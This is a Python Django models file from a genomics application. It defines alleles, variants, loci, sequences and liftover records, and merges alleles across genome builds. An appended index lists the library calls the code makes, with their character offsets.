va = self.variantallele_set.all().first()
if va is None:
raise ValueError("Allele contains no VariantAlleles at all! Cannot liftover")
dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version)
if dbsnp:
g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)
conversion_tool = AlleleConversionTool.DBSNP
variant_tuple = None
if g_hgvs:
variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)
return conversion_tool, variant_tuple
def merge(self, conversion_tool, other_allele: "Allele") -> bool:
""" Merge other_allele into this allele """
if self == other_allele:
raise ValueError(f"Attempt to merge {self} to itself!")
can_merge = True
merge_log_message = f"{other_allele} merge into {self}"
other_clingen_allele = other_allele.clingen_allele
if other_clingen_allele and self.clingen_allele:
can_merge = False
merge_log_message = f"Error performing {merge_log_message}: both have ClinGen Alleles!"
AlleleMergeLog.objects.create(old_allele=other_allele,
new_allele=self,
conversion_tool=conversion_tool,
success=can_merge,
message=merge_log_message)
if can_merge:
if other_clingen_allele:
                # Move the ClinGen Allele across (it may not have been retrievable in all builds, but at least one
                # build links there, and this allele has no ClinGen Allele of its own, so the move is safe)
other_allele.clingen_allele = None
other_allele.save()
self.clingen_allele = other_clingen_allele
self.save()
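            # Re-point flags, flag watches, clinical contexts and classifications from the old allele onto this one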
if other_fc := other_allele.flag_collection:
other_fc.flag_set.update(collection=self.flag_collection_safe)
other_fc.flagwatch_set.update(flag_collection=self.flag_collection)
existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list("name", flat=True)
other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)
other_fc.classification_set.update(flag_collection=self.flag_collection)
existing_allele_cc_names = self.clinicalcontext_set.values_list("name", flat=True)
other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self)
for va in other_allele.variantallele_set.all():
try:
va.allele = self
va.conversion_tool = conversion_tool
va.save()
except IntegrityError:
logging.warning("VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one",
va.allele, va.genome_build, va.variant)
va.delete()
return can_merge
@property
def build_names(self) -> str:
return ", ".join(sorted(self.variantallele_set.values_list("genome_build__name", flat=True)))
def __str__(self):
name = f"Allele {self.pk}"
if self.clingen_allele:
name += f" ({self.clingen_allele})"
return name
def __format__(self, format_spec: str):
if format_spec == 'CA' and (cligen_allele := self.clingen_allele):
return str(cligen_allele)
else:
return f"Allele {self.pk}"
def validate(self, liftover_complete=True):
"""
:param liftover_complete: If False does not check for missing representations
"""
if liftover_complete:
v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first()
v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first()
if v37:
self.close_open_flags_of_type(allele_flag_types.missing_37)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True)
if v38:
self.close_open_flags_of_type(allele_flag_types.missing_38)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True)
allele_validate_signal.send(sender=Allele, allele=self)
@receiver(flag_collection_extra_info_signal, sender=FlagCollection)
def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument
alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids)
allele: Allele
for allele in alleles:
flag_infos.set_extra_info(allele.flag_collection_id, {
'label': f'Allele {allele.id}'
}, source_object=allele)
class AlleleMergeLog(TimeStampedModel):
""" Keep track of calls to Allele.merge() """
old_allele = models.ForeignKey(Allele, related_name="old_allele_merge", on_delete=CASCADE)
new_allele = models.ForeignKey(Allele, related_name="new_allele_merge", on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
success = models.BooleanField(default=True)
message = models.TextField(null=True)
VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')
class Sequence(models.Model):
"""
We want to guarantee seq is unique (so Locus/Variant can have unique constraints)
Postgres by default uses indexes for constraints, and large TextFields give error of:
"index row requires x bytes, maximum size is 8191"
The easiest solution is to md5sum seq and make the constraint on that. Another possible solution is to use
Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights).
Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration
"""
seq = models.TextField()
seq_md5_hash = models.CharField(max_length=32, unique=True)
length = models.IntegerField()
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
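        # Populate the md5 hash on first save so the unique constraint (which is on the hash, not the sequence) holds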
if not self.seq_md5_hash:
self.seq_md5_hash = md5sum_str(self.seq)
super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
@staticmethod
def abbreviate(s: str, max_length: int = 20):
if len(s) > max_length:
s = f"{s[:3]}...{s[-3:]}"
return s
def __str__(self):
return self.abbreviate(self.seq)
@staticmethod
def get_pk_by_seq(q=None):
qs = Sequence.objects.all()
if q:
qs = qs.filter(q)
return dict(qs.values_list("seq", "pk"))
def is_standard_sequence(self):
""" only contains G/A/T/C/N """
return not re.match(r"[^GATCN]", self.seq)
class Locus(models.Model):
""" 1 per line in a VCF file (multiple Variants with different alt alleles point to the same locus)
There is only 1 Locus for a given chrom/position/ref per database (handled via insertion queues) """
contig = models.ForeignKey(Contig, on_delete=CASCADE)
position = models.IntegerField(db_index=True)
ref = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("contig", "position", "ref")
@property
def chrom(self):
return self.contig.name
def __str__(self):
return f"{self.chrom}:{self.position} {self.ref}"
class Variant(models.Model):
""" Variants represent the different alleles at a locus
Usually 2+ per line in a VCF file (ref + >= 1 alts pointing to the same locus for the row)
There is only 1 Variant for a given locus/alt per database (handled via insertion queues) """
REFERENCE_ALT = "="
locus = models.ForeignKey(Locus, on_delete=CASCADE)
alt = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("locus", "alt")
@staticmethod
def get_chrom_q(chrom):
return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom)
@staticmethod
def get_contigs_q(genome_build: GenomeBuild):
""" Restrict to contigs in a genome build """
return Q(locus__contig__genomebuildcontig__genome_build=genome_build)
@staticmethod
def get_no_reference_q():
return ~Q(alt__seq=Variant.REFERENCE_ALT)
@staticmethod
def get_overlap_annotate_and_q(contig, start, end):
""" Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start """
annotation_kwargs = {"longest_sequence": Greatest("locus__ref__length", "alt__length"),
"end_position": F("locus__position") + F("longest_sequence")}
q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start)
return annotation_kwargs, q
@staticmethod
def annotate_variant_string(qs, name="variant_string", path_to_variant=""):
""" Return a "1:123321 G>C" style string in a query """
kwargs = {name: Concat(f"{path_to_variant}locus__contig__name", V(":"),
f"{path_to_variant}locus__position", V(" "),
f"{path_to_variant}locus__ref__seq", V(">"),
f"{path_to_variant}alt__seq", output_field=TextField())}
return qs.annotate(**kwargs)
@staticmethod
def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:
if abbreviate:
ref = Sequence.abbreviate(ref)
alt = Sequence.abbreviate(alt)
return f"{chrom}:{position} {ref}>{alt}"
@staticmethod
def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate:
""" regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) """
variant_tuple = None
if m := regex_pattern.match(variant_string):
chrom, position, ref, alt = m.groups()
chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt,
want_chr=genome_build.reference_fasta_has_chr)
contig = genome_build.chrom_contig_mappings[chrom]
variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)
return variant_tuple
@staticmethod
def get_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern=VARIANT_PATTERN) -> Optional['Variant']:
variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)
try:
return Variant.get_from_tuple(variant_tuple, genome_build)
except Variant.DoesNotExist:
return None
@staticmethod
def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':
params = ["locus__contig__name", "locus__position", "locus__ref__seq", "alt__seq"]
return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,
**dict(zip(params, variant_tuple)))
@lazy
def genome_builds(self) -> Set['GenomeBuild']:
gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),
contig__locus__variant=self)
return {gbc.genome_build for gbc in gbc_qs}
@lazy
def coordinate(self) -> VariantCoordinate:
locus = self.locus
contig = locus.contig
return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)
@staticmethod
def is_ref_alt_reference(ref, alt):
return ref == alt or alt == '.'
@property
def is_reference(self) -> bool:
return self.alt.seq == self.REFERENCE_ALT
@property
def is_standard_variant(self) -> bool:
""" Variant alt sequence is standard [GATCN] (ie not special or reference) """
# locus.ref should always be standard...
return self.alt.is_standard_sequence()
@property
def is_indel(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length
@property
def is_insertion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length
@property
def is_deletion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length
@property
def can_have_clingen_allele(self) -> bool:
return self.is_standard_variant or self.is_reference
@property
def can_have_annotation(self) -> bool:
return self.is_standard_variant
def as_tuple(self) -> VariantCoordinate:
return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq
def is_abbreviated(self):
return str(self) != self.full_string
@lazy
def full_string(self):
""" No abbreviation """
return self.format_tuple(*self.as_tuple())
def __str__(self):
return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele_from_variant', kwargs={"variant_id": self.pk})
@lazy
def allele(self) -> Optional[Allele]:
va = VariantAllele.objects.filter(variant=self).first()
if va:
return va.allele
return None
@property
def equivalent_variants(self) -> Iterable['Variant']:
allele = self.allele
if not allele:
return [self]
return Variant.objects.filter(variantallele__allele=allele)
def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first()
def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():
return can
if version := self.varianttranscriptannotation_set.filter(version=vav).first():
return version
if any_at_all := self.varianttranscriptannotation_set.first():
return any_at_all
def get_canonical_c_hgvs(self, genome_build):
c_hgvs = None
if cta := self.get_canonical_transcript_annotation(genome_build):
c_hgvs = cta.hgvs_c
return c_hgvs
@property
def start(self):
return self.locus.position
@property
def end(self):
return self.locus.position + max(self.locus.ref.length, self.alt.length)
@staticmethod
def clean_variant_fields(chrom, position, ref, alt, want_chr):
ref = ref.strip().upper()
alt = alt.strip().upper()
if Variant.is_ref_alt_reference(ref, alt):
alt = Variant.REFERENCE_ALT
chrom = format_chrom(chrom, want_chr)
return chrom, position, ref, alt
class VariantWiki(Wiki):
variant = models.OneToOneField(Variant, on_delete=CASCADE)
class VariantAllele(TimeStampedModel):
""" It's possible for multiple variants from the same genome build to
resolve to the same allele (due to our normalization not being the same as ClinGen
        or 2 loci in a genome build being represented by 1 locus in the build being used
        by ClinGen) - but it's not likely. Having the same variant/build/allele triple twice
        would be a bug, so we can add that unique_together constraint
We only expect to store Alleles for a small fraction of Variants
So don't want them on the Variant object - instead do 1-to-1 """
# Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases
# we'll have the same variant linked through different VariantAlleles (so it can't be 1-to-1)
variant = models.ForeignKey(Variant, on_delete=CASCADE)
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
error = models.JSONField(null=True) # Only set on error
class Meta:
unique_together = ("variant", "genome_build", "allele")
@property
def canonical_c_hgvs(self):
return self.variant.get_canonical_c_hgvs(self.genome_build)
def needs_clingen_call(self):
if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None:
if self.error:
# Retry if server was down
return self.error.get("errorType") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE
return True
return False
def __str__(self):
return f"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})"
class VariantCollection(RelatedModelsPartitionModel):
""" A set of variants - usually used as a cached result """
RECORDS_BASE_TABLE_NAMES = ["snpdb_variantcollectionrecord"]
RECORDS_FK_FIELD_TO_THIS_MODEL = "variant_collection_id"
PARTITION_LABEL_TEXT = "variant_collection"
name = models.TextField(null=True)
count = models.IntegerField(null=True)
status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED)
@property
def variant_collection_alias(self):
return f"variantcollection_{self.pk}"
def get_annotation_kwargs(self):
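        # Expose membership of this collection as a filterable relation alias on Variant querysets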
vcr_condition = Q(variantcollectionrecord__variant_collection=self)
return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)}
def get_q(self):
if self.status != ProcessingStatus.SUCCESS:
raise ValueError(f"{self}: status {self.get_status_display()} != SUCCESS")
return Q(**{f"{self.variant_collection_alias}__isnull": False})
def __str__(self):
return f"VariantCollection: {self.pk} ({self.name})"
class VariantCollectionRecord(models.Model):
variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition
variant = models.ForeignKey(Variant, on_delete=CASCADE)
class AlleleSource(models.Model):
""" Provides a source of alleles for liftover pipelines. """
objects = InheritanceManager()
def get_genome_build(self):
return None
def get_variants_qs(self):
return Variant.objects.none()
def get_allele_qs(self):
return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())
def liftover_complete(self, genome_build: GenomeBuild):
""" This is called at the end of a liftover pipeline (once per build) """
pass
class VariantAlleleSource(AlleleSource):
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
def get_genome_build(self):
return self.variant_allele.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele=self.variant_allele)
@staticmethod
def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:
""" Only works if liftover was done via VariantAlleleSource """
allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)
return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()
class VariantAlleleCollectionSource(AlleleSource):
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
def get_genome_build(self):
return self.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())
def get_variant_allele_ids(self):
return self.variantallelecollectionrecord_set.values_list("variant_allele", flat=True)
class VariantAlleleCollectionRecord(models.Model):
collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
class Liftover(TimeStampedModel):
""" Liftover pipeline involves reading through a VCF where ID is set to Allele.pk and then creating
VariantAllele entries for the variant/allele
        For some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build
        For others (NCBI Remap) we need to write the source genome build VCF first
        Alleles must have already been created - allele_source is used to retrieve them
The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline """
user = models.ForeignKey(User, on_delete=CASCADE)
allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
source_vcf = models.TextField(null=True)
source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,
related_name="liftover_source_genome_build")
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination
def get_allele_source(self) -> AlleleSource:
""" Returns subclass instance """
return AlleleSource.objects.get_subclass(pk=self.allele_source_id)
def get_allele_qs(self) -> QuerySet:
return self.get_allele_source().get_allele_qs()
def complete(self):
self.get_allele_source().liftover_complete(genome_build=self.genome_build)
def __str__(self):
source = ""
if self.source_genome_build:
source = f"from {self.source_genome_build.name} "
return f"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}"
class LiftoverError(models.Model):
liftover = models.ForeignKey(Liftover, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
    variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE)  # Optional: set if we got a variant but it was invalid
error_message = models.TextField()
class Meta:
unique_together = ('liftover', 'allele')
def __str__(self):
return f"{self.allele} failed {self.liftover}: {self.error_message}"
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.dispatch.receiver",
"django.db.models.functions.Greatest",
"django.db.models.Value",
"logging.warning",
"django.db.models.JSONField",
"django.db.models.BooleanField",
"django.db.models.F",
"snpdb.models.models_genome.GenomeBuild.grch38",
"django.db.models.query_utils.FilteredRelation",
"django.db.models.query_utils.Q",
"re.match",
"django.db.models.fields.TextField",
"library.utils.md5sum_str",
"snpdb.models.models_dbsnp.DbSNP.get_for_variant",
"snpdb.models.models_genome.GenomeBuild.grch37",
"snpdb.models.models_genome.GenomeBuild.builds_with_annotation",
"re.compile",
"django.db.models.OneToOneField",
"flags.models.models.FlagTypeContext.objects.get",
"library.genomics.format_chrom",
"django.db.models.CharField",
"genes.hgvs.get_hgvs_variant_tuple",
"model_utils.managers.InheritanceManager",
"django.db.models.IntegerField",
"collections.namedtuple",
"django.urls.base.reverse"
] | [((1406, 1467), 're.compile', 're.compile', (['"""^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)$"""', 're.IGNORECASE'], {}), "('^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)$', re.IGNORECASE)\n", (1416, 1467), False, 'import re\n'), ((1527, 1600), 're.compile', 're.compile', (['"""^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)>(=|[GATC]+)$"""', 're.IGNORECASE'], {}), "('^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)>(=|[GATC]+)$', re.IGNORECASE)\n", (1537, 1600), False, 'import re\n'), ((9703, 9769), 'django.dispatch.receiver', 'receiver', (['flag_collection_extra_info_signal'], {'sender': 'FlagCollection'}), '(flag_collection_extra_info_signal, sender=FlagCollection)\n', (9711, 9769), False, 'from django.dispatch import receiver\n'), ((10612, 10676), 'collections.namedtuple', 'collections.namedtuple', (['"""VariantCoordinate"""', '"""chrom pos ref alt"""'], {}), "('VariantCoordinate', 'chrom pos ref alt')\n", (10634, 10676), False, 'import collections\n'), ((1991, 2056), 'django.db.models.OneToOneField', 'models.OneToOneField', (['ClinGenAllele'], {'null': '(True)', 'on_delete': 'CASCADE'}), '(ClinGenAllele, null=True, on_delete=CASCADE)\n', (2011, 2056), False, 'from django.db import models, IntegrityError\n'), ((10236, 10313), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'related_name': '"""old_allele_merge"""', 'on_delete': 'CASCADE'}), "(Allele, related_name='old_allele_merge', on_delete=CASCADE)\n", (10253, 10313), False, 'from django.db import models, IntegrityError\n'), ((10331, 10408), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'related_name': '"""new_allele_merge"""', 'on_delete': 'CASCADE'}), "(Allele, related_name='new_allele_merge', on_delete=CASCADE)\n", (10348, 10408), False, 'from django.db import models, IntegrityError\n'), ((10431, 10499), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2)', 'choices': 'AlleleConversionTool.choices'}), '(max_length=2, choices=AlleleConversionTool.choices)\n', (10447, 10499), False, 'from django.db import models, IntegrityError\n'), ((10514, 10547), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (10533, 10547), False, 'from django.db import models, IntegrityError\n'), ((10562, 10589), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (10578, 10589), False, 'from django.db import models, IntegrityError\n'), ((11306, 11324), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (11322, 11324), False, 'from django.db import models, IntegrityError\n'), ((11344, 11388), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'unique': '(True)'}), '(max_length=32, unique=True)\n', (11360, 11388), False, 'from django.db import models, IntegrityError\n'), ((11402, 11423), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (11421, 11423), False, 'from django.db import models, IntegrityError\n'), ((12505, 12549), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Contig'], {'on_delete': 'CASCADE'}), '(Contig, on_delete=CASCADE)\n', (12522, 12549), False, 'from django.db import models, IntegrityError\n'), ((12565, 12599), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'db_index': '(True)'}), '(db_index=True)\n', (12584, 12599), False, 'from django.db import models, IntegrityError\n'), ((12610, 12656), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Sequence'], {'on_delete': 'CASCADE'}), '(Sequence, on_delete=CASCADE)\n', (12627, 12656), 
False, 'from django.db import models, IntegrityError\n'), ((13209, 13252), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Locus'], {'on_delete': 'CASCADE'}), '(Locus, on_delete=CASCADE)\n', (13226, 13252), False, 'from django.db import models, IntegrityError\n'), ((13263, 13309), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Sequence'], {'on_delete': 'CASCADE'}), '(Sequence, on_delete=CASCADE)\n', (13280, 13309), False, 'from django.db import models, IntegrityError\n'), ((20911, 20959), 'django.db.models.OneToOneField', 'models.OneToOneField', (['Variant'], {'on_delete': 'CASCADE'}), '(Variant, on_delete=CASCADE)\n', (20931, 20959), False, 'from django.db import models, IntegrityError\n'), ((21763, 21808), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Variant'], {'on_delete': 'CASCADE'}), '(Variant, on_delete=CASCADE)\n', (21780, 21808), False, 'from django.db import models, IntegrityError\n'), ((21828, 21877), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'on_delete': 'CASCADE'}), '(GenomeBuild, on_delete=CASCADE)\n', (21845, 21877), False, 'from django.db import models, IntegrityError\n'), ((21891, 21935), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'on_delete': 'CASCADE'}), '(Allele, on_delete=CASCADE)\n', (21908, 21935), False, 'from django.db import models, IntegrityError\n'), ((21949, 22009), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1)', 'choices': 'AlleleOrigin.choices'}), '(max_length=1, choices=AlleleOrigin.choices)\n', (21965, 22009), False, 'from django.db import models, IntegrityError\n'), ((22032, 22100), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2)', 'choices': 'AlleleConversionTool.choices'}), '(max_length=2, choices=AlleleConversionTool.choices)\n', (22048, 22100), False, 'from django.db import models, IntegrityError\n'), ((22113, 22140), 'django.db.models.JSONField', 'models.JSONField', ([], {'null': '(True)'}), '(null=True)\n', (22129, 22140), False, 'from django.db import models, IntegrityError\n'), ((23125, 23152), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (23141, 23152), False, 'from django.db import models, IntegrityError\n'), ((23165, 23195), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (23184, 23195), False, 'from django.db import models, IntegrityError\n'), ((23209, 23312), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1)', 'choices': 'ProcessingStatus.choices', 'default': 'ProcessingStatus.CREATED'}), '(max_length=1, choices=ProcessingStatus.choices, default=\n ProcessingStatus.CREATED)\n', (23225, 23312), False, 'from django.db import models, IntegrityError\n'), ((24031, 24089), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantCollection'], {'on_delete': 'DO_NOTHING'}), '(VariantCollection, on_delete=DO_NOTHING)\n', (24048, 24089), False, 'from django.db import models, IntegrityError\n'), ((24134, 24179), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Variant'], {'on_delete': 'CASCADE'}), '(Variant, on_delete=CASCADE)\n', (24151, 24179), False, 'from django.db import models, IntegrityError\n'), ((24295, 24315), 'model_utils.managers.InheritanceManager', 'InheritanceManager', ([], {}), '()\n', (24313, 24315), False, 'from model_utils.managers import InheritanceManager\n'), ((24777, 24828), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantAllele'], {'on_delete': 
'CASCADE'}), '(VariantAllele, on_delete=CASCADE)\n', (24794, 24828), False, 'from django.db import models, IntegrityError\n'), ((25462, 25511), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'on_delete': 'CASCADE'}), '(GenomeBuild, on_delete=CASCADE)\n', (25479, 25511), False, 'from django.db import models, IntegrityError\n'), ((25901, 25968), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantAlleleCollectionSource'], {'on_delete': 'CASCADE'}), '(VariantAlleleCollectionSource, on_delete=CASCADE)\n', (25918, 25968), False, 'from django.db import models, IntegrityError\n'), ((25990, 26041), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantAllele'], {'on_delete': 'CASCADE'}), '(VariantAllele, on_delete=CASCADE)\n', (26007, 26041), False, 'from django.db import models, IntegrityError\n'), ((26619, 26661), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'CASCADE'}), '(User, on_delete=CASCADE)\n', (26636, 26661), False, 'from django.db import models, IntegrityError\n'), ((26682, 26732), 'django.db.models.ForeignKey', 'models.ForeignKey', (['AlleleSource'], {'on_delete': 'CASCADE'}), '(AlleleSource, on_delete=CASCADE)\n', (26699, 26732), False, 'from django.db import models, IntegrityError\n'), ((26755, 26823), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2)', 'choices': 'AlleleConversionTool.choices'}), '(max_length=2, choices=AlleleConversionTool.choices)\n', (26771, 26823), False, 'from django.db import models, IntegrityError\n'), ((26841, 26868), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (26857, 26868), False, 'from django.db import models, IntegrityError\n'), ((26895, 27005), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'null': '(True)', 'on_delete': 'CASCADE', 'related_name': '"""liftover_source_genome_build"""'}), "(GenomeBuild, null=True, on_delete=CASCADE, related_name=\n 'liftover_source_genome_build')\n", (26912, 27005), False, 'from django.db import models, IntegrityError\n'), ((27064, 27113), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'on_delete': 'CASCADE'}), '(GenomeBuild, on_delete=CASCADE)\n', (27081, 27113), False, 'from django.db import models, IntegrityError\n'), ((27796, 27842), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Liftover'], {'on_delete': 'CASCADE'}), '(Liftover, on_delete=CASCADE)\n', (27813, 27842), False, 'from django.db import models, IntegrityError\n'), ((27856, 27900), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'on_delete': 'CASCADE'}), '(Allele, on_delete=CASCADE)\n', (27873, 27900), False, 'from django.db import models, IntegrityError\n'), ((27915, 27971), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Variant'], {'null': '(True)', 'on_delete': 'CASCADE'}), '(Variant, null=True, on_delete=CASCADE)\n', (27932, 27971), False, 'from django.db import models, IntegrityError\n'), ((28034, 28052), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (28050, 28052), False, 'from django.db import models, IntegrityError\n'), ((2178, 2224), 'django.urls.base.reverse', 'reverse', (['"""view_allele"""'], {'kwargs': "{'pk': self.id}"}), "('view_allele', kwargs={'pk': self.id})\n", (2185, 2224), False, 'from django.urls.base import reverse\n'), ((2293, 2333), 'flags.models.models.FlagTypeContext.objects.get', 'FlagTypeContext.objects.get', ([], {'pk': '"""allele"""'}), "(pk='allele')\n", (2320, 2333), False, 
'from flags.models.models import FlagsMixin, FlagTypeContext\n'), ((13651, 13713), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig__genomebuildcontig__genome_build': 'genome_build'}), '(locus__contig__genomebuildcontig__genome_build=genome_build)\n', (13652, 13713), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((14204, 14278), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig': 'contig', 'locus__position__lte': 'end', 'end_position__gte': 'start'}), '(locus__contig=contig, locus__position__lte=end, end_position__gte=start)\n', (14205, 14278), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((18905, 18972), 'django.urls.base.reverse', 'reverse', (['"""view_allele_from_variant"""'], {'kwargs': "{'variant_id': self.pk}"}), "('view_allele_from_variant', kwargs={'variant_id': self.pk})\n", (18912, 18972), False, 'from django.urls.base import reverse\n'), ((20799, 20828), 'library.genomics.format_chrom', 'format_chrom', (['chrom', 'want_chr'], {}), '(chrom, want_chr)\n', (20811, 20828), False, 'from library.genomics import format_chrom\n'), ((23471, 23522), 'django.db.models.query_utils.Q', 'Q', ([], {'variantcollectionrecord__variant_collection': 'self'}), '(variantcollectionrecord__variant_collection=self)\n', (23472, 23522), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((23817, 23873), 'django.db.models.query_utils.Q', 'Q', ([], {}), "(**{f'{self.variant_collection_alias}__isnull': False})\n", (23818, 23873), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((5613, 5657), 'genes.hgvs.get_hgvs_variant_tuple', 'get_hgvs_variant_tuple', (['g_hgvs', 'genome_build'], {}), '(g_hgvs, 